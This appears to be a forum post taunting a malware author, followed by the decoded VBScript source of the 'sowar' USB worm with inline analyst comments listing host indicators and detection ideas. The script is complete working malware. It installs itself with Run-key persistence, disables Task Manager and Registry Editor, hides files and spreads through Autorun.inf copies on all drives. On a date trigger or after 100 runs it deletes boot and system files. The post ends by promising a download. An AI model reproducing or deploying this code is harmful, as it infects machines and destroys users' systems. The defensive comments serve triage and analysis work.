Honestly, I am just laughing at your REVISED code. Even if you ENCRYPT your code, I can still read it clearly.
This is to tell you to stop making nonsense, because it is just useless...
Just make stuff that is useful and good, instead of working on stuff that was originally NOT yours.
You and Dave are alike :P
See yeah
' vbs.sowar (philippines)
' Analyst notes (code below is unchanged): main body of the script.
' Sequence visible here: show a decoy, copy self into the Windows folder,
' register a Run-key autostart, apply registry changes, run the date/counter
' payload check, then enter the drive-copy loop.
' Host indicators that appear in this listing (useful for triage and cleanup):
'   - file  <Windows folder>\esto.vbs (read-only + hidden + system)
'   - value HKLM\Software\Microsoft\Windows\CurrentVersion\Run\System Restore
'           = wscript.exe "<Windows folder>\esto.vbs"
'   - keys  HKCU\Software\sowar\stats and HKLM\Software\sowar\count
'   - files itcr.vbs, un.vbs and Autorun.inf in drive roots
' Every error is suppressed, so failed steps (e.g. HKLM writes without admin
' rights) leave no visible message; absence of one artefact does not rule out
' the others.
On Error Resume Next
Dim fso, WHsP, WinDir, MyFName
Set fso=CreateObject("Scripting.FileSystemObject")
Set WHsP=CreateObject("WScript.Shell")
' Full path of the running script; used as the copy source everywhere below.
MyFName=WScript.ScriptFullName
' GetSpecialFolder(0) is the Windows folder.
WinDir=fso.GetSpecialFolder(0)
' Mid(MyFName, 4) drops the first three characters ("X:\"), so this branch
' matches only when the script runs as itcr.vbs from a drive root. It then
' opens that folder in Explorer, so the user sees the drive contents they
' expected when the drive was opened.
If LCase(Mid(MyFName, 4)) = "itcr.vbs" Then
WHsP.Run "explorer.exe " & Left(MyFName, InStrRev(MyFName, "\") - 1)
' Any other launch location except the installed copy shows the Notepad decoy.
ElseIf LCase(MyFName) <> LCase(WinDir & "\esto.vbs") Then
Call LoadTxtFile()
End If
' Install step: overwrite-copy to the Windows folder, then set attributes
' 39 = ReadOnly(1) + Hidden(2) + System(4) + Archive(32).
fso.CopyFile MyFName, WinDir & "\esto.vbs", True
fso.GetFile(WinDir & "\esto.vbs").Attributes=39
' Persistence: machine-wide Run value named "System Restore". Detection idea:
' alert on Run entries that start wscript.exe with a .vbs under the Windows folder.
WHsP.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\System Restore", "wscript.exe """ & WinDir & "\esto.vbs"""
Call MakeRegEntries()
Call PayloadIt()
' HKCU\Software\sowar\stats acts as a hand-off flag between instances.
' IActiv is pre-set to "" so a missing value (RegRead error, suppressed) reads as "".
IActiv=""
IActiv=WHsP.RegRead("HKEY_CURRENT_USER\Software\sowar\stats")
If (IActiv="" Or IActiv=0) Then
' Flag = 1 tells an already-looping instance to exit (InitSpread polls it
' every 4 s); the 25.5 s wait gives that instance time to notice.
WHsP.RegWrite "HKEY_CURRENT_USER\Software\sowar\stats", 1
WScript.Sleep 25500
Call InitSpread()
Else
' Flag already 1: another instance is mid hand-off, so this one exits.
WScript.Quit
End If
' Analyst notes (code unchanged): applies the registry changes listed below.
' Called once at start-up and again on every pass of the loop in InitSpread,
' so values reset by hand are rewritten within seconds while a wscript.exe
' instance is still running. Stop the process before restoring these values.
' Uses the globals WHsP (WScript.Shell) and WinDir. Errors are suppressed.
Sub MakeRegEntries()
On Error Resume Next
With WHsP
' Internet Explorer start page and window title are overwritten.
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://"
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "en"
' IE policy value; presumably blocks changing the home page in the UI - confirm.
.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\Homepage", 1, "REG_DWORD"
' Marker string; a distinctive value to search for during triage.
.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\IeakHelpString", "HACKED USING: SOWAR"
' Explorer view settings: Hidden is set to 0 and file extensions are hidden.
' NOTE(review): presumably meant to keep the hidden copies and the .vbs
' extension out of view; confirm the effect of Hidden=0 on the Windows version in scope.
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD"
' Per-user policies that disable Registry Editor and Task Manager. Both
' writes are high-signal detection points: either value set to 1 by a
' script host process deserves an alert.
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
' AutoRun policy mask set to 128 (0x80). The bits that would disable AutoRun
' for removable and fixed drives are left clear. Hardened baselines set this
' mask to 255 (0xFF) to disable AutoRun on all drive types.
.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
' Re-asserts the same Run-key persistence value that the main body writes.
.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\System Restore", "wscript.exe """ & WinDir & "\esto.vbs"""
End With
End Sub
' Analyst notes (code unchanged): endless loop that, about every 4 seconds,
' writes copies of the script plus an Autorun.inf to the root of each ready
' drive and re-applies the registry changes.
' Scoping note for responders: the filter is DriveType > 0, which in the
' FileSystemObject model covers removable, fixed, network, CD-ROM and RAM-disk
' drives. Mapped network shares and fixed drive roots need checking for
' itcr.vbs, un.vbs and Autorun.inf, not just USB media.
' Uses the globals fso, WHsP and MyFName. Errors are suppressed.
Sub InitSpread()
On Error Resume Next
' Clear the hand-off flag: this instance is now the active one.
WHsP.RegWrite "HKEY_CURRENT_USER\Software\sowar\stats", 0
Do
Set ActivDrives=fso.Drives
For Each USBFlashDrv In ActivDrives
DrivePath = USBFlashDrv.Path
' NOTE(review): the second test compares DriveType with a drive-letter string.
' The apparent intent is to skip A: and B:, but the visible code does not
' establish that floppy drives are actually excluded.
If (USBFlashDrv.DriveType > 0 And USBFlashDrv.DriveType <> "A:" And USBFlashDrv.Path <> "B:") Then
If (USBFlashDrv.IsReady) Then
' itcr.vbs: hidden copy (39 = ReadOnly + Hidden + System + Archive).
fso.CopyFile MyFName, DrivePath & "\itcr.vbs", True
fso.GetFile(DrivePath & "\itcr.vbs").Attributes=39
' un.vbs: visible copy (32 = Archive only).
fso.CopyFile MyFName, DrivePath & "\un.vbs", True
fso.GetFile(DrivePath & "\un.vbs").Attributes=32
' Any existing Autorun.inf is replaced: attributes are set to 34
' (Hidden + Archive, i.e. read-only/system cleared) and the file is deleted.
If fso.FileExists(DrivePath & "\Autorun.inf") Then
fso.GetFile(DrivePath & "\Autorun.inf").Attributes=34
fso.DeleteFile DrivePath & "\Autorun.inf", True
End If
' New Autorun.inf: every listed entry (open and the shell Open / AutoPlay /
' Explore commands) starts wscript.exe on itcr.vbs. An Autorun.inf in a drive
' root that references wscript.exe is a simple scanning signature.
Set AutoRunScript=fso.CreateTextFile(DrivePath & "\Autorun.inf", True)
AutoRunScript.WriteLine "[autorun]"
AutoRunScript.WriteLine "open=wscript.exe itcr.vbs"
AutoRunScript.WriteLine "shell\Open\Command=wscript.exe itcr.vbs"
AutoRunScript.WriteLine "shell\Open\Default=1"
AutoRunScript.WriteLine "shell\AutoPlay\Command=wscript.exe itcr.vbs"
AutoRunScript.WriteLine "shell\Explore\Command=wscript.exe itcr.vbs"
AutoRunScript.Close
fso.GetFile(DrivePath & "\Autorun.inf").Attributes=39
End If
End If
Next
' Poll the hand-off flag: a newer instance sets it to 1, and this one exits.
IsActiv=""
IsActiv=WHsP.RegRead("HKEY_CURRENT_USER\Software\sowar\stats")
If IsActiv=1 Then
WScript.Quit
End If
' Re-apply the registry changes on every pass, then wait 4 seconds.
Call MakeRegEntries()
WScript.Sleep 4000
Loop
End Sub
' Analyst notes (code unchanged): decoy shown when the script is started from
' anywhere other than a drive-root itcr.vbs or the installed esto.vbs.
' It creates <Windows folder>\<script base name>.txt containing the text "un"
' and opens it in Notepad, so the double-click appears to open a text file.
' The leftover .txt in the Windows folder is another host artefact; its name
' follows the name the script was launched under.
' Uses the globals fso, WHsP, WinDir and MyFName. Errors are suppressed.
Sub LoadTxtFile()
On Error Resume Next
' File name of the running script without its directory.
bname=Mid(MyFName, InStrRev(MyFName, "\") + 1)
' Same base name with the extension replaced by .txt, placed in the Windows folder.
txtfilename=WinDir & "\" & Left(bname, InStrRev(bname, ".")-1) & ".txt"
Set txtfile=fso.CreateTextFile(txtfilename, True)
txtfile.write "un"
txtfile.close
WHsP.Run "notepad.exe """ & txtfilename & """"
End Sub
' Analyst notes (code unchanged): run counter plus destructive trigger.
' Each execution increments HKLM\Software\sowar\count. The destructive branch
' is taken on 12 June (system clock) or once the stored count exceeds 100.
' The count value lets responders estimate how often the script has run on a
' host and how close it is to the trigger.
' Uses the globals fso, WHsP and windir (VBScript names are case-insensitive,
' so this is the same variable as WinDir). Errors are suppressed.
Sub PayloadIt()
On Error Resume Next
' Pre-set to "" so a missing value (RegRead error, suppressed) reads as "".
CurCount=""
CurCount=WHsP.RegRead("HKEY_LOCAL_MACHINE\Software\sowar\count")
If (CurCount="" Or CurCount=0) Then
NewCount=0
WHsP.RegWrite "HKEY_LOCAL_MACHINE\Software\sowar\count", 1, "REG_DWORD"
Else
NewCount=CurCount
WHsP.RegWrite "HKEY_LOCAL_MACHINE\Software\sowar\count", CurCount + 1, "REG_DWORD"
End If
If (Day(Date) = 12 And Month(Date) = 6) Or (NewCount > 100) Then
' Left(windir, 3) is the root of the drive holding the Windows folder ("X:\").
' The listed names are deleted from that root and from the Windows folder;
' several are boot/start-up files on Windows 9x-era systems. Impact on later
' Windows versions is not established by this listing.
fso.DeleteFile Left(windir, 3) & "ndetect.com", True
fso.DeleteFile Left(windir, 3) & "Io.sys", True
fso.DeleteFile Left(windir, 3) & "Msdos.sys", True
fso.DeleteFile windir & "\himem.sys", True
fso.DeleteFile windir & "\Win.com", True
fso.DeleteFile windir & "\system.ini", True
fso.DeleteFile windir & "\win.ini", True
' Attempts to launch rundll32 with a shell32 entry point, presumably to force
' a restart. NOTE(review): whether this call succeeds is not established by
' the visible code, so do not assume a reboot occurred when building a timeline.
wsh.Run "rundll32.exe shell32.dll,SHExitWindowsEx 2"
End If
End Sub
' sowar.a (ver. 1.0.5)
' Copyright(C) Jet F.
Decrypted by CaDeAtH
HERE - soon to be downloadable